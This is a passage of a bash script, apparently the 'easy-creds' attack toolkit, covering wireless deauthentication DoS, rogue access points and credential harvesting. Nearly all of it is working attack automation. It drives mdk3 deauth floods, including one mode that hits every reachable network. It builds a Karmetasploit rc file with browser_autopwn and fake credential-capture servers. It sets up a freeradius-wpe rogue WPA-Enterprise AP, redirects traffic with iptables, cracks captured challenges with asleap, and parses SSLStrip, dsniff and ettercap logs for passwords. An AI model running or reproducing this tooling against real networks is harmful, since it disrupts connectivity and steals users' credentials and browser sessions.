fi if [ "${SIDEJACK}" == "y" ]; then f_sidejack fi echo -e "\n\e[1;34m[*]\e[0m Do you ever imagine things in the garden of your mind?" sleep 5 } ################################################## f_fakeapeviltwin(){ eviltwin=1 ESSID=default f_fakeapAttack } ################################################## f_mdk3aps(){ clear f_Banner dosattack=1 # grep the MACs to a temp white list ifconfig -a| grep wlan| grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-white.lst echo read -p "Do you have the BSSID address of the AP you'd like to attack? [y/N]: " havemac havemac="$(echo ${havemac} | tr 'A-Z' 'a-z')" echo if [ "${havemac}" == "y" ]; then unset dosmac while [ -z "${dosmac}" ]; do read -p "Please enter the BSSID address of the AP you wish to DoS: " dosmac; done echo "${dosmac}" > /tmp/ec/ec-dosap airmon-ng | egrep 'wlan|ath' | sed '$a\\n' unset doswlan while [ -z ${doswlan} ];do read -p "Please enter the wireless device to use for DoS attack: " doswlan; done phyint=$(airmon-ng | grep ${doswlan} | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;") echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack." airmon-ng start ${doswlan} & sleep 3 dosmon=$(airmon-ng | sed -n "s/.*\(mon.*${phyint}\).*/\1/p;" | cut -f1) echo -e "\nUsing ${dosmon} for the attack.\n\n" echo -e "\n\e[1;34m[*]\e[0m Please standby while we DoS the AP with BSSID Address $dosmac..." sleep 3 if [ -z $isxrunning ]; then screen -S easy-creds -X screen -t MDK3-DoS mdk3 ${dosmon} d -b /tmp/ec/ec-dosap else xterm -geometry "${width}"x${height}+${x}-${y} -T "MDK3 AP DoS" -e mdk3 ${dosmon} d -b /tmp/ec/ec-dosap & fi #Get the PID so we can kill it when the user quits the attack ps ax|grep mdk3|grep -v grep|grep -v xterm|cut -d " " -f1 > /tmp/ec/dosap.pid #Sometimes it's field #1 and sometimes #2 not sure why if [ -z $(cat /tmp/ec/dosap.pid) ]; then ps ax|grep mdk3|grep -v grep|grep -v xterm|cut -d " " -f2 > /tmp/ec/dosap.pid;fi echo -e "\n\e[1;34m[*]\e[0m Ctrl-c or close the xterm window to stop the AP DoS attack..." else f_getbssids fi f_mainmenu } ################################################## f_lastman(){ clear f_Banner dosattack=1 echo -e "\n\e[1;34m[*]\e[0m This attack will DoS every AP BSSID & Client MAC it can reach.\n\e[1;31m[*]\e[0m Use with extreme caution\n\n" # grep the MACs to a temp white list ifconfig | grep wlan| grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-white.lst airmon-ng | egrep '(wlan|mon)' | sed '$a\\n' unset doswlan while [ -z ${doswlan} ];do read -p "Please enter the wireless device to use for DoS attack: " doswlan; done phyint=$(airmon-ng | grep ${doswlan} | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;") echo -e "\n\e[1;34m[*]\e[0m Placing the wireless card in monitor mode to perform DoS attack." airmon-ng start ${doswlan} &> /dev/null sleep 3 dosmon=$(airmon-ng | sed -n "s/.*\(mon.*${phyint}\).*/\1/p;" | cut -f1) echo -e "\n\e[1;34m[*]\e[0m Using ${dosmon} for attack." echo -e "\n\e[1;34m[*]\e[0m Press ctrl-c to stop the attack..." sleep 3 if [ -z ${isxrunning} ]; then screen -S easy-creds -X screen -t Last-Man-Standing mdk3 ${dosmon} d -w /tmp/ec/ec-white.lst;(airmon-ng stop ${airomon} >/dev/null) else xterm -geometry 70x10+0-0 -T "Last Man Standing" -e mdk3 ${dosmon} d -w /tmp/ec/ec-white.lst;(airmon-ng stop ${airomon} >/dev/null) & fi sleep 2 #Get the PID so we can kill it when the user quits the attack ps ax|grep mdk3|grep -v grep|grep -v xterm|cut -d " " -f1 > /tmp/ec/dosap.pid if [ -z $(cat /tmp/ec/dosap.pid) ]; then ps ax|grep mdk3|grep -v grep|grep -v xterm|cut -d " " -f2 > /tmp/ec/dosap.pid;fi f_mainmenu } ################################################## f_getbssids(){ clear f_Banner echo -e "\n\e[1;34m[*]\e[0m This will launch airodump-ng and allow you to specify the AP to DoS" airmon-ng | grep wlan | sed '$a\\n' unset airowlan while [ -z ${airowlan} ];do read -p "Please enter the wireless device to use for DoS attack: " airowlan; done phyint=$(airmon-ng | grep ${airowlan} | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;") echo -e "\n\e[1;34m[*]\e[0m Placing the wireless card in monitor mode to perform DoS attack." airmon-ng start ${airowlan} > /dev/null & sleep 3 airomon=$(airmon-ng | sed -n "s/.*\(mon.*${phyint}\).*/\1/p;" | cut -f1) echo -e "\n\e[1;34m[*]\e[0m Starting airodump-ng with $airomon, [ctrl+c] in the window when you see the ESSID(s) you want to attack.\e[0m" if [ -z ${isxrunning} ]; then screen -S easy-creds -X screen -t Airodump airodump-ng ${airomon} -w /tmp/ec/airodump-ec --output-format csv else xterm -geometry 90x25+0+0 -T "Airodump" -e airodump-ng ${airomon} -w /tmp/ec/airodump-ec --output-format csv & fi echo $! > /tmp/ec/airodump.pid #wait for the process to die while [ ! -z $(ps -p "$(cat /tmp/ec/airodump.pid)" | grep "$(cat /tmp/ec/airodump.pid)" | sed 's/ //g') ]; do sleep 3; done sleep 3 #sometimes the mon interface doesn't transition properly after airodump, decided to stop the interface and restart it clean airmon-ng stop ${airomon} &> /dev/null echo -e "\n\e[1;34mThe following APs were identified:\e[0m" #IFS variable allows for spaces in the name of the ESSIDs and will still display it on one line SAVEIFS=${IFS} IFS=$(echo -en "\n\b") for apname in $(cat /tmp/ec/airodump-ec-01.csv | egrep -a '(OPN|MGT|WEP|WPA)'| cut -d "," -f14|sed '/^$/d'|sed -e 's/^[ \t]*//'|sort -u);do echo -e "\e[1;34m[*]\e[0m ${apname}" done echo IFS=${SAVEIFS} unset dosapname while [ -z ${dosapname} ]; do read -p "Please enter the ESSID you'd like to attack: " dosapname done cat /tmp/ec/airodump-ec-01.csv | egrep -a '(OPN|MGT|WEP|WPA)'| grep -a -i "${dosapname}" |cut -d "," -f1 > /tmp/ec/ec-macs rm /tmp/ec/airodump-ec* #Make sure none of your MACs end up in the blacklist diff -i /tmp/ec/ec-macs /tmp/ec/ec-white.lst | grep -v ">"|grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-dosap echo -e "\n\e[1;34m[*]\e[0m Now Deauthing clients from ${dosapname}.\n\t-If there is more than one BSSID, all will be attacked...\e" airmon-ng start ${airowlan} &> /dev/null sleep 3 if [ -z ${isxrunning} ]; then echo -e "\e[1;34m[*]\e[0m ctrl-c the screen terminal to stop the attack" sleep 5 screen -S easy-creds -X screen -t MDK3-AP-DoS mdk3 ${airomon} d -b /tmp/ec/ec-dosap;(airmon-ng stop ${airomon} >/dev/null) else echo -e "\e[1;34m[*]\e0m close the xterm window to stop the attack..." xterm -geometry 70x10+0-0 -T "MDK3 AP DoS" -e mdk3 ${airomon} d -b /tmp/ec/ec-dosap;(airmon-ng stop ${airomon} >/dev/null) & fi } ################################################## f_KarmaAttack(){ # Credit to Metasploit Unleashed, used as a base wireless=1 karmasploit=1 clear f_Banner f_xtermwindows echo -e "Network Interfaces:\n" ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n' while [ -z ${IFACE} ]; do read -p "Interface connected to the internet, example eth0: " IFACE; done airmon-ng while [ -z ${WIFACE} ]; do read -p "Wireless interface name, example wlan0: " WIFACE; done airmon-ng start ${WIFACE} &> /dev/null modprobe tun echo -e "\n\e[1;34m[*]\e[0m Your interface has now been placed in Monitor Mode\n" airmon-ng | grep mon | sed '$a\\n' unset MONMODE while [ -z ${MONMODE} ]; do read -p "Enter your monitor enabled interface name (ex. mon0): " MONMODE; done unset TUNIFACE while [ -z ${TUNIFACE} ]; do read -p "Enter your tunnel interface (ex. at0): " TUNIFACE; done f_karmadhcp f_karmasetup f_karmafinal f_mainmenu } ################################################## f_karmadhcp(){ unset ATCIDR while [ -z ${ATCIDR} ]; do read -p "Network range for your tunneled interface, example 10.0.0.0/24: " ATCIDR; done unset ATDNS while [ -z ${ATDNS} ]; do read -p "Enter the IP address for the DNS server, example 8.8.8.8: " ATDNS; done f_ipcalc } ################################################## f_karmasetup(){ cat <<-EOF > /tmp/ec/karma.rc spool ${logfldr}/karma.${DATE}.txt use auxiliary/server/browser_autopwn setg AUTOPWN_HOST ${ATIP} setg AUTOPWN_PORT 55550 setg AUTOPWN_URI /ads set LHOST ${ATIP} set LPORT 45000 set SRVPORT 55550 set URIPATH /ads run use auxiliary/server/capture/pop3 set SRVPORT 110 set SSL false run use auxiliary/server/capture/pop3 set SRVPORT 995 set SSL true run use auxiliary/server/capture/ftp run use auxiliary/server/capture/imap set SSL false set SRVPORT 143 run use auxiliary/server/capture/imap set SSL true set SRVPORT 993 run use auxiliary/server/capture/smtp set SSL false set SRVPORT 25 run use auxiliary/server/capture/smtp set SSL true set SRVPORT 465 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 5353 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 53 run use auxiliary/server/capture/http set SRVPORT 80 set SSL false run use auxiliary/server/capture/http set SRVPORT 8080 set SSL false run use auxiliary/server/capture/http set SRVPORT 443 set SSL true run use auxiliary/server/capture/http set SRVPORT 8443 set SSL true run EOF } ################################################## f_karmafinal(){ echo -e "\e[1;34m[*]\e[0m Launching Airbase..." # airbase-ng is going to create our fake AP with the SSID default if [ -z ${isxrunning} ]; then screen -dmS easy-creds -t Airbase-NG airbase-ng -P -C 30 -e default -v ${MONMODE} else xterm -geometry "${width}"x${height}-${x}+${y} -T "Airbase-NG" -e airbase-ng -P -C 30 -e "default" -v ${MONMODE} & fi sleep 7 ps ax|grep airbase|grep -v grep|grep -v xterm|cut -d " " -f1 > /tmp/ec/ec-karma.pid if [ -z $(cat /tmp/ec/ec-karma.pid) ]; then ps ax|grep airbase|grep -v grep|grep -v xterm|cut -d " " -f1 > /tmp/ec/ec-karma.pid; fi echo -e "\e[1;34m[*]\e[0m Configuring tunneled interface." ifconfig ${TUNIFACE} up ifconfig ${TUNIFACE} ${ATIP} netmask ${ATSUB} ifconfig ${TUNIFACE} mtu 1500 route add -net ${ATNET} netmask ${ATSUB} gw ${ATIP} dev ${TUNIFACE} sleep 3 echo -e "\e[1;34m[*]\e[0m Setting up iptables to handle traffic seen by the tunneled interface." iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o ${IFACE} -j MASQUERADE sleep 3 #Blackhole Routing - Forces clients to go through attacker even if they have cached DNS entries iptables -t nat -A PREROUTING -i ${TUNIFACE} -j REDIRECT echo -e "\e[1;34m[*]\e[0m Launching Tail..." if [ -z ${isxrunning} ]; then screen -S easy-creds -t DMESG -X screen tail -f /var/log/messages else y=$((${y}+${yoffset})) xterm -geometry "${width}"x${height}-${x}+${y} -T "DMESG" -bg black -fg red -e tail -f /var/log/messages & fi sleep 3 #Get the PID so we can kill it when the user quits the attack ps ax|grep tail|grep -v grep|grep -v xterm|cut -d " " -f1 > /tmp/ec/tail.pid if [ -z $(cat /tmp/ec/tail.pid) ]; then ps ax|grep tail|grep -v grep|grep -v xterm|cut -d " " -f2 > /tmp/ec/tail.pid; fi echo -e "\e[1;34m[*]\e[0m DHCP server starting on tunneled interface." if [ -e /etc/dhcp/dhcpd.conf ]; then service isc-dhcp-server start elif [ -e /etc/dhcp3/dhcpd.conf ]; then dhcpd3 -q -cf ${DHCPPATH} -pf /var/run/dhcp3-server/dhcpd.pid ${TUNIFACE} & elif [ -e /etc/sysconfig/dhcpd ]; then systemctl start dhcpd.service else echo -e "\n\e[1;32m[!]\e[0m Couldn't find a DHCP server to start.\n" fi sleep 3 if [ -z ${isxrunning} ]; then echo -e "\e[1;34m[*]\e[0m Launching Karmetasploit in screen. Once it loads press ctrl-a then d return to this window.\n" sleep 5 screen -S Karmetasploit -t msfconsole msfconsole -r /tmp/ec/karma.rc else echo -e "\e[1;34m[*]\e[0m Launching Karmetasploit, this may take a little bit..." y=$((${y}+${yoffset})) xterm -geometry "${width}"x${height}-${x}+${y} -bg black -fg white -T "Karmetasploit" -e msfconsole -r /tmp/ec/karma.rc & fi sleep 2 #Get the PID so we can kill it when the user quits the attack ps ax|grep msfconsole|grep -v grep|grep -v xterm|cut -d " " -f1 > /tmp/ec/ec-metasploit.pid if [ -z $(cat /tmp/ec/ec-metasploit.pid) ]; then ps ax|grep msfconsole|grep -v grep|grep -v xterm|cut -d " " -f2 > /tmp/ec/ec-metasploit.pid; fi #Enable IP forwarding echo "1" > /proc/sys/net/ipv4/ip_forward echo -e "\n\e[1;34m[*]\e[0m Do you ever imagine things in the garden of your mind?" sleep 5 } ################################################## f_freeradiusattack(){ clear f_Banner fra=1 #installed by user if [ -e /usr/local/var/log/radius/freeradius-server-wpe.log ] || [ -x /usr/local/sbin/radiusd ]; then freeradiuslog=/usr/local/var/log/radius/freeradius-server-wpe.log pathtoradiusconf=/usr/local/etc/raddb #installed by package manager else freeradiuslog=/var/log/radius/freeradius-server-wpe.log pathtoradiusconf=/etc/raddb fi atheroscard=$(lsmod | grep -c 'ath') if [ "${atheroscard}" -lt "1" ]; then echo -e "\n\e[1;31m[-]\e[0m I could not find and Atheros wireless card.\nAttack only works with an atheros chipset...\n" sleep 5 fi mv ${pathtoradiusconf}/radiusd.conf ${pathtoradiusconf}/radiusd.conf.back 2&1> /dev/null mv ${pathtoradiusconf}/clients.conf ${pathtoradiusconf}/clients.conf.back 2&1> /dev/null if [ -e ${pathtoradiusconf} ]; then cat ${pathtoradiusconf}/radiusd.conf.back | sed -e '/^proxy_request/s/yes/no/' -e 's/\$INCLUDE proxy.conf/#\$INCLUDE proxy.conf/' > ${pathtoradiusconf}/radiusd.conf else while [! -e ${pathtoradiusconf} ] && [ -z ${pathtoradiusconf} ]; do echo -e "\n\e[1;31m[-]\e[0m I cannot find your radius.conf file, please provide the path" read -e -p ": " pathtoradiusconf done cat "${pathtoradiusconf}" | sed -e '/^proxy_request/s/yes/no/' -e 's/\$INCLUDE proxy.conf/#\$INCLUDE proxy.conf/' > ${pathtoradiusconf}/radiusd.conf fi unset radiussecret while [ -z ${radiussecret} ]; do read -p "Please enter the shared secret you'd like to use for the radius connection: " radiussecret done f_buildclientsconf f_hostapd f_freeradiusfinal f_mainmenu } ################################################## f_buildclientsconf(){ cat <<-EOF > ${pathtoradiusconf}/clients.conf client localhost { ipaddr = 127.0.0.1 secret = ${radiussecret} require_message_authenticator = no nastype = other } client 192.168.0.0/16 { secret = ${radiussecret} shortname = testAP } client 172.16.0.0/12 { secret = ${radiussecret} shortname = testAP } client 10.0.0.0/8 { secret = ${radiussecret} shortname = testAP } EOF } ################################################## f_hostapd(){ airmon-ng | grep 'wlan' unset radwiface while [ -z ${radwiface} ]; do echo -en "\nPlease enter your wirless interface for the attack (ex: wlan0)" read -p " : " radwiface done unset radssid while [ -z ${radssid} ]; do echo -en "\nPlease enter SSID you'd like to use for the attack (ex: FreeWifi)" read -p " : " radssid done unset radchannel while [ -z ${radchannel} ]; do echo -en "\nPlease enter the channel you'd like to use for the attack" read -p " : " radchannel done cat <<-EOF > /tmp/ec/ec-hostapd.conf interface=${radwiface} driver=nl80211 ssid=${radssid} logger_stdout=-1 logger_stdout_level=0 dump_file=/tmp/hostapd.dump ieee8021x=1 eapol_key_index_workaround=0 own_ip_addr=127.0.0.1 auth_server_addr=127.0.0.1 auth_server_port=1812 auth_server_shared_secret=${radiussecret} wpa=1 hw_mode=g channel=${radchannel} wpa_pairwise=TKIP CCMP wpa_key_mgmt=WPA-EAP EOF } ################################################## f_freeradiusfinal(){ echo -e "\n\e[1;34m[*]\e[0m Launching the FreeRadius server...\n" if [ ! -z ${isxrunning} ]; then xterm -geometry "${width}"x${height}-${x}+${y} -T "Radius Server" -bg white -fg black -e radiusd -X -f & echo $! > /tmp/ec/freeradius.pid sleep 3 else screen -dmS FreeRadius -t Radius-Server radiusd -X -f echo $! > /tmp/ec/freeradius.pid fi echo -e "\n\e[1;34m[*]\e[0m Launching hostapd...\n" sleep 3 if [ ! -z ${isxrunning} ]; then y=$((${y}+${yoffset})) xterm -geometry "${width}"x${height}-${x}+${y} -T "hostapd" -bg black -fg white -e hostapd /tmp/ec/ec-hostapd.conf & sleep 3 else screen -S FreeRadius -X screen -t Hostapd hostapd /tmp/ec/ec-hostapd.conf echo $! > /tmp/ec/hostapd.pid fi if [ ! -e ${freeradiuslog} ]; then touch ${freeradiuslog} fi echo -e "\n\e[1;34m[*]\e[0m Launching credential log file...\n" sleep 3 if [ ! -z ${isxrunning} ]; then y=$((${y}+${yoffset})) xterm -geometry "${width}"x${height}-${x}+${y} -T "credentials" -bg black -fg green -hold -l -lf ${logfldr}/freeradius-creds-$(date +%F-%H%M).txt -e tail -f ${freeradiuslog} & sleep 3 else screen -S FreeRadius -X screen -t credentials tail -f ${freeradiuslog} screen -S FreeRadius -p credentials -X logfile ${logfldr}/freeradius-creds-$(date +%F-%H%M).txt screen -S FreeRadius -p credentials -X log sleep 3 fi sleep 2 #Get the PID so we can kill it when the user quits the attack ps ax|grep tail|grep -v grep|grep -v xterm|cut -d " " -f1 > /tmp/ec/tail.pid if [ -z $(cat /tmp/ec/tail.pid) ] ; then ps ax|grep tail|grep -v grep|grep -v xterm|cut -d " " -f2 > /tmp/ec/tail.pid; fi tshark -i ${radwiface} -w ${logfldr}/freeradius-creds-$(date +%F-%H%M).dump &> /dev/null & echo $! > /tmp/ec/tshark.pid } ################################################## # # DATA REVIEW FUNCTIONS # ################################################## f_SSLStrip(){ clear f_Banner if [ -d ${logfldr} ]; then if [[ ! -z $(ls ${logfldr}|grep -i sslstrip) ]]; then echo "SSLStrip logs in current log folder:" ls ${logfldr}/sslstrip* 2>/dev/null echo -e "\n" fi fi if [ -e ${PWD}/strip-accts.txt ]; then rm ${PWD}/strip-accts.txt; fi unset LOGPATH while [ -z ${LOGPATH} ] || [ ! -f "${LOGPATH}" ]; do read -e -p "Enter the full path to your SSLStrip log file: " LOGPATH; done unset DEFS while [ -z ${DEFS} ] || [ ! -e "${DEFS}" ]; do read -e -p "Enter the full path to your SSLStrip definitions file: " DEFS done NUMLINES=$(cat "${DEFS}" | wc -l) i=1 while [ ${i} -le "${NUMLINES}" ]; do VAL1=$(awk -v k=${i} 'FNR == k {print $1}' "$DEFS") VAL2=$(awk -v k=${i} 'FNR == k {print $2}' "$DEFS") VAL3=$(awk -v k=${i} 'FNR == k {print $3}' "$DEFS") VAL4=$(awk -v k=${i} 'FNR == k {print $4}' "$DEFS") GREPSTR="$(grep -a ${VAL2} "${LOGPATH}" | grep -a ${VAL3} | grep -a ${VAL4})" if [ "${GREPSTR}" ]; then echo -n "${VAL1}" "- " >> ${PWD}/strip-accts.txt echo "${GREPSTR}" | \ sed -e 's/.*'${VAL3}'=/'${VAL3}'=/' -e 's/&/ /' -e 's/&.*//' >> ${PWD}/strip-accts.txt fi i=$[${i}+1] done if [ -s ${PWD}/strip-accts.txt ] && [ -z ${isxrunning} ]; then cat ${PWD}/strip-accts.txt | less elif [ -s ${PWD}/strip-accts.txt ] && [ ! -z ${isxrunning} ]; then xterm -geometry 80x24-0+0 -T "SSLStrip Accounts" -hold -bg white -fg black -e cat ${PWD}/strip-accts.txt & else echo -e "\n\e[1;31m[-]\e[0m Sorry no credentials captured..." sleep 5 fi f_DataReviewMenu } ####################################################### f_dsniff(){ clear f_Banner if [ -d ${logfldr} ]; then echo "Dsniff logs in current log folder:" ls ${logfldr}/dsniff* 2>/dev/null echo -e "\n\n" fi unset DSNIFFPATH while [ -z ${DSNIFFPATH} ] || [ ! -f "${DSNIFFPATH}" ]; do read -e -p "Enter the path for your dsniff Log file: " DSNIFFPATH done dsniff -r ${DSNIFFPATH} >> ${PWD}/dsniff-log.txt if [ -z ${isxrunning} ];then cat ${PWD}/dnsiff-log.txt | less else xterm -hold -bg blue -fg white -geometry 80x24-0+0 -T "Dsniff Accounts" -e cat ${PWD}/dsniff-log.txt & fi f_DataReviewMenu } ################################################## f_EtterLog(){ clear f_Banner if [ -d ${logfldr} ]; then echo "Ettercap logs in current log folder:" ls ${logfldr}/*.eci 2>/dev/null echo -e "\n" fi unset ETTERECI while [ -z ${ETTERECI} ] || [ ! -f "${ETTERECI}" ]; do read -e -p "Enter the full path to your ettercap.eci log file: " ETTERECI; done etterlog -p "${ETTERECI}" >> ${PWD}/etterlog.txt if [ -z ${isxrunning} ]; then cat ${PWD}/etterlog.txt | less else xterm -hold -bg blue -fg white -geometry 80x24-0+0 -T "Ettercap Accounts" -e cat ${PWD}/etterlog.txt & fi f_DataReviewMenu } ################################################## f_freeradiuscreds(){ unset credlist while [ -z "${credlist}" ] && [ ! -e "${credlist}" ]; do echo -n -e "\nPlease enter the path to your FreeRadius Attack credential list" read -e -p ": " credlist done unset wordlist while [ -z "${wordlist}" ] && [ ! -e "${wordlist}" ]; do echo -n -e "\nPlease enter the path to your wordlist" read -e -p ": " wordlist done echo -n -e "\n\e[1;34m[*]\e[0m Please standby, this may take a while..." acreds="${PWD}/asleap-creds-$(date +%F-%H%M).txt" touch ${acreds} cat ${credlist}|egrep '(username|challenge|response)'|cut -d ":" -f2-|sed -e 's/^[ \t]*//' > /tmp/ec/freeradius-creds.tmp NUMLINES=$(cat /tmp/ec/freeradius-creds.tmp|wc -l) i=1 while [ $i -le "${NUMLINES}" ]; do username=$(awk NR==${i} /tmp/ec/freeradius-creds.tmp) i=$[${i}+1] challenge=$(awk NR==${i} /tmp/ec/freeradius-creds.tmp|tr -d '\r') i=$[${i}+1] response=$(awk NR==${i} /tmp/ec/freeradius-creds.tmp|tr -d '\r') i=$[${i}+1] echo "Username: ${username}" >> "${acreds}" asleap -C ${challenge} -R ${response} -W ${wordlist} | grep "password:"| sed -e 's/[\t ]//g;/^$/d'| sed -e 's/:/: /g' >> "${acreds}" echo >> ${acreds} done if [ -s ${acreds} ]; then echo -n -e "\n\e[1;34m[*]\e[0m Your cracked credentials can be found at ${acreds}..." else echo -n -e "\n\e[1;34m[*]\e[0m I wasn't able to crack any of the passwords..." rm ${acreds} fi sleep 5 f_DataReviewMenu } ################################################## # # MENU FUNCTIONS # ################################################## f_Banner(){ echo -e " ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ " echo -e "||\e[1;36me\e[0m |||\e[1;36ma\e[0m |||\e[1;36ms\e[0m |||\e[1;36my\e[0m |||\e[1;36m-\e[0m |||\e[1;36mc\e[0m |||\e[1;36mr\e[0m |||\e[1;36me\e[0m |||\e[1;36md\e[0m |||\e[1;36ms\e[0m ||" echo -e "||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||" echo -e "|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|" echo -e "\e[1;33m Version 3.8-dev - Garden of New Jersey\e[0m" echo echo -e "\e[1;33mAt any time,\e[0m \e[1;36mctrl+c\e[0m \e[1;33m to cancel and return to the main menu\e[0m" echo } ################################################## f_prereqs(){ clear f_Banner echo "1. Edit etter.conf" echo "2. Edit etter.dns" echo "3. Install dhcp server" echo "4. Install karmetasploit prereqs" echo "5. Add tunnel interface to dhcp server" echo "6. Update Metasploit Framework" echo "7. Update Aircrack-ng" echo "8. How-to Videos (Launches Web Browser)" echo "9. Previous Menu" echo read -p "Choice: " prereqschoice case ${prereqschoice} in 1) f_nanoetter ;; 2) f_nanoetterdns ;; 3) f_dhcp_server_install ;; 4) f_karmareqs ;; 5) f_addtunnel ;; 6) f_msfupdate ;; 7) f_aircrackupdate ;; 8) f_howtos ;; 9) f_mainmenu ;; *) f_prereqs ;; esac } ################################################## f_poisoning(){ clear f_Banner echo "1. Create Victim Host List" echo "2. Standard ARP Poison" echo "3. Oneway ARP Poison" echo "4. DHCP Poison" echo "5. DNS Poison" echo "6. ICMP Poison" echo "7. Previous Menu" echo read -p "Choice: " poisoningchoice case ${poisoningchoice} in 1) f_HostScan ;; 2) f_Standard ;; 3) f_Oneway ;; 4) f_DHCPPoison ;; 5) f_DNSPoison ;; 6) f_ICMP ;; 7) f_mainmenu ;; *) f_poisoning ;; esac } ################################################## f_fakeapattacks(){ clear f_Banner echo "1. FakeAP Attack Static" echo "2. FakeAP Attack EvilTwin" echo "3. Karmetasploit Attack" echo "4. FreeRadius Attack" echo "5. DoS AP Options" echo "6. Previous Menu" echo read -p "Choice: " fapchoice case ${fapchoice} in 1) f_fakeapAttack ;; 2) f_fakeapeviltwin ;; 3) f_KarmaAttack ;; 4) f_freeradiusattack ;; 5) f_DoSOptions ;; 6) f_mainmenu ;; *) f_FakeAP-Menu ;; esac } ###################################################### f_DoSOptions(){ clear f_Banner echo "1. Attack a Single or Multiple APs" echo "2. Last Man Standing (Use with Caution)" echo "3. Previous Menu" echo read -p "Choice: " doschoice case ${doschoice} in 1) f_mdk3aps ;; 2) f_lastman ;; 3) f_fakeapattacks ;; *) f_DoSOptions ;; esac } ###################################################### f_DataReviewMenu(){ clear f_Banner echo "1. Parse SSLStrip log for credentials" echo "2. Parse dsniff file for credentials" echo "3. Parse ettercap eci file for credentials" echo "4. Parse freeradius attack file for credentials" echo "5. Previous Menu" echo read -p "Choice: " datareviewchoice case ${datareviewchoice} in 1) f_SSLStrip ;; 2) f_dsniff ;; 3) f_EtterLog ;; 4) f_freeradiuscreds ;; 5) f_mainmenu ;; *) f_DataReviewMenu ;; esac } ################################################## f_ICMP(){ clear f_Banner echo -e "\e[1;31m[-]\e[0m If you are connected to a switch this attack won't work." echo -e "\e[1;31m[-]\e[0m You must be able to see ALL traffic for this attack to work.\n" read -p "Do you wish to continue? [y/N]: " icmpswitch if [ $(echo ${icmpswitch} | tr 'A-Z' 'a-z') == "y" ]; then f_ICMPPoison else f_poisoning fi } ################################################## f_mainmenu(){ clear f_Banner echo "1. Prerequisites & Configurations" echo "2. Poisoning Attacks" echo "3. FakeAP Attacks" echo "4. Data Review" echo "5. Exit" echo "q. Quit current poisoning session" echo read -p "Choice: " mainchoice case ${mainchoice} in 1) unset clean; f_prereqs ;; 2) unset clean; f_poisoning ;; 3) unset clean; f_fakeapattacks ;; 4) unset clean; f_DataReviewMenu ;; 5) f_checkexit ;; 1968) f_pbs ;; Q|q) f_Quit ;; *) f_mainmenu ;; esac } # run as root if [ "$(id -u)" != "0" ]; then echo -e "\e[1;31m[!]\e[0m This script must be run as root" 1>&2 exit 1 else mkdir /tmp/ec f_isxrunning f_xtermwindows f_prereq_check clean=1 f_mainmenu fi